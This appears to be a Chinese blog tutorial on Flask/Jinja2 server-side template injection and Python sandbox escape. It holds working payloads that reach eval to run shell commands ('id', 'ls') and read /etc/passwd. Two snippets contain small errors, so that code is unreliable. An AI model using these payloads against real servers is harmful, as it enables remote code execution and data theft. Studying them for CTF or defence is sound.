flask ssti漏洞(补充)

最新推荐文章于 2025-06-03 23:19:32 发布
原创 最新推荐文章于 2025-06-03 23:19:32 发布 · 589 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#flask #python #后端

本文探讨了安全问题中的SSTI漏洞,通过实例演示如何利用eval函数执行任意代码,并介绍了在不同Python版本中规避沙盒的方法,包括利用file对象和寻找__builtins__中的eval来实现代码执行。重点在于Python2和3环境下逃逸沙盒的技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞利用

前几篇文章分析了ssti漏洞的成因,以及一些常用过得payload

获取eval函数执行任意代码测试

Vulhub上的ssti文档是直接给了个获取eval函数并执行任意python代码的POC

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

python沙盒逃逸

利用python特殊方法bypass沙盒

一、用file对象读取文件(python2)

构造继承链的思路是

  1. 随便找一个内置类对象用class拿到他所对应的类
  2. bases拿到基类(<class 'object'>)
  3. subclasses()拿到子类列表
  4. 在子类列表中直接寻找可以利用的类
().\_\_class__.\_\_bases\_\_[0].\_\_subclasses__()

 在这堆列表里找到file对应的对象:利用小脚本

t = ().__class__.__bases__[0].__subclasses__()
for c in t:
    if c.__name__ == 'file':
        print t.index(c)

 现在用dir查看file对象的内置方法:

 利用readlines方法读取/etc/passwd文件

().\_\_class__.\_\_bases\_\_[0].\_\_subclasses__()[40]('/etc/passwd').readlines

故可以构造ssti payload

{% for c in ().__class__.__bases__[0].__subclasses__():%}
{% if c.__name__ == 'file':%}
{{"Success! File contents is <br />"}}
{% c('/etc/passwd').readlines() %}
{% endif %}
{% endfor %}

 以上方法只适用于python2,在python3<type 'file'>已不存在

二、寻找__builtins__中的eval

上面file对象只能Python2使用,那么如果遇上Python3该怎么办呢。
关于__builtins__,本文之前介绍python特殊方法是提到过,它包含了python的内置函数,而eval正在里面。所以只要找到eval,管他python2、python3,盘就完事了。

分别用python2、python3运行下面代码,找出含__builtins__的类,找一个python2、3共有的类

for c in ().__class__.__bases__[0].__subclasses__():
    try:    #这里代码为啥要用try呢,因为不是每个对象都有\_\_globals__
        if '__builtins__' in c.__init__.__globals__.keys():
            print(c.name)
    except:
        pass

如:_IterationGuard类是python 2、3共有的,则可以构造下面payload,执行ls命令

{% for c in ().__class__.__bases__[0].__subclasses__(): %}
{% if c.__name__ == '_IterationGuard': %}
{{c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls').read()") }}
{% endif %}
{% endfor %}

【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 7544
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
【网络安全 | 1.5w字总结】SSTI漏洞入门
热门推荐
等风来
08-24 1万+
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 4044
web安全-SSTI模板注入漏洞
web攻防之SSTI 注入漏洞
最新发布
2301_81155391的博客
06-03 993
ssti的中文翻译 : 服务端的模版的注入模版引擎 :前端的用于装饰优化html的模版 最简单的就是在腾讯会议中的聊天功能框架 : 这个是一套独立存在的逻辑 如TP他是一个区别于php语法的后端逻辑(框架的作用就是 优化后端的功能和安全性)两者的共性就是为了省时怎么发现对方的web套用了模版引擎主要是看页面的规律性和是不是非常的板正,大部分的web都是套用的模版 手写的工程量是非常大的。
Flask框架漏洞SSTI
glass_york的博客
12-01 2911
SSTI 是 Server-Side Template Injection即 服务端模板注入,它是一种安全漏洞攻击技术。当应用程序在服务器端使用模板引擎来呈现动态生成的内容时,如果用户可以控制模板引擎的输入,就可能导致 SSTI 漏洞。在正常情况下,模板引擎被设计用于安全地将预定义的模板与数据进行组合,生成最终的输出。但是,SSTI 漏洞允许攻击者在应用程序的上下文中执行任意的服务器端代码。当攻击者能够通过用户输入或其他外部来源插入恶意的模板代码时,就会产生一系列问题。
flask SSTI漏洞
jiet07的博客
08-07 4831
文章目录第一章flask ssti漏洞的代码(长什么样子)第二章 前言(基础知识储备)第三章 服务器端模板(SST)第四章 服务器模板注入(SSTI)第五章 例子(CTF)第五章 如何防御服务器模板注入参考资料附录 第一章flask ssti漏洞的代码(长什么样子) 1.1 代码 from flask import Flask from flask import request from flask import render_template_string from flask import render
SSTI漏洞模板扫描(flask、Werkzeup)
墨痕诉清风的博客
08-07 641
代码】SSTI漏洞模板扫描。
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过》 SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
知识点(SSTI漏洞/flask框架/tonado框架)
2401_87524087的博客
02-08 720
Jinja2模版引擎(属于Flask框架,Python语言)和其他模板引擎,例:Twig(属于Symfony框架,PHP语言), Smarty(属于Codelgniter框架,PHP语言)Jinja2 是 Python 中一个模板引擎,常用于模板渲染,它提供了丰富的语法和功能,能方便地将动态数据与静态模板相结合,生成最终的 HTML、XML 等文档。在模板内的用法也和python中类似,遍历的对象可以是字典、元组、列表等,但需要注意的是在模板中无法使用continue和break来对循环进行控制。
SSTI漏洞基础解析
weixin_43895765的博客
04-01 5664
🚩flask基础 flaskpython编写的一个WEB应用程序框架,flask由Armin Ronacher带领的一个Pocco团队开发,flask基于werkzeug WSGI工具包个jinjia2模板引擎~ WSGI:Web Server Gateway Interface 即WEB服务器网关接口 🚩第一个flask程序 # 从flask中导入Flask,注意,flask是包名,Flask是模块名 from flask import Flask # 初始化Flask app = Flask(
[python]浅谈FlaskSSTI漏洞
记录学习,一起进步
04-03 1682
[python]浅谈FlaskSSTI漏洞
Flask框架-SSTI模板注入漏洞
soldi_er的博客
04-30 1849
文章目录使用Flask搭建网站模板渲染flask有2个渲染方法测试代码1测试代码2存在漏洞的代码,测试代码3利用模板注入漏洞环境准备魔术方法和模块利用漏洞Payload测试和收录参考 使用Flask搭建网站   1、本地环境: 环境 版本 编辑器 Pycharm/2019.3.3 开发语言 Python/3.7.6 框架 Flask/1.1.1 渲染 Jinja2/2.11.1 Response指纹 Server: Werkzeug/1.0.0 Python/3.7.6
SSTI注入漏洞
大河之犬的博客
06-05 1712
服务器端模板注入是一种漏洞,当攻击者可以将恶意代码注入到在服务器上执行的模板中时发生Jinja是一种常用的用于Web应用程序的模板引擎。在这段易受攻击的代码中,用户请求中的 name 参数直接通过 render 函数传递到模板中。这可能允许攻击者向 name 参数中注入恶意代码,导致服务器端模板注入。将负载注入到name参数中。此负载可以包含Jinja模板指令,使攻击者能够执行未经授权的代码或操纵模板引擎,潜在地控制服务器。
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 3004
Flask SSTI漏洞介绍及利用
基础漏洞——SSTI(服务器模板注入)
2301_79096184的博客
09-27 1398
首先可以通过SSTI(Server-Side Template Injection)从名字可以看出即是服务器端模板注入。有些框架一般都采用MVC的模式。用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。MVC架构M:mysqlV:VIEWC:控制器C:控制器——>M:mysql——>V:VIEW。
SSTI漏洞详解
apple_74953689的博客
07-26 3068
SSTI(Server-Side Template Injection)是一种发生在服务器端模板中的漏洞。当应用程序接受用户输入并将其直接传递到模板引擎中进行解析时,如果未对用户输入进行,攻击者可以通过构造来注入模板代码,导致服务器端模板引擎执行恶意代码。more常见的模板有很多,不同模板的语法也不相同,在实际情况我们可以测试判断属于哪一种模板。下面将引用一个简单的例子来说明,假设有一个包含以下代码的Twig模板文件Hello, 49!但是,如果攻击者将。
Flask(Jinja2)服务端模板注入漏洞SSTI)整理
qq_46145027的博客
04-19 2062
整理一下Flask框架下的SSTI漏洞相关知识
SSTI漏洞初手入门
kracer的博客
01-08 1162
0x01 什么是SSTI SSTI,即服务器端模板注入(Server-Side Template Injection)。攻击者在服务器输入语句,服务端将其作为Web应用模板内容的一部分,在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容,从而导致信息泄露、代码执行、GetShell等问题。 补充: 1)模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过...
SSTI漏洞
03-25
### SSTI漏洞概述 服务器端模板注入(Server-Side Template Injection, SSTI)是一种允许攻击者通过向应用程序输入恶意模板代码来执行任意命令的安全漏洞。这种类型的漏洞通常发生在使用模板引擎的应用程序中,当...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值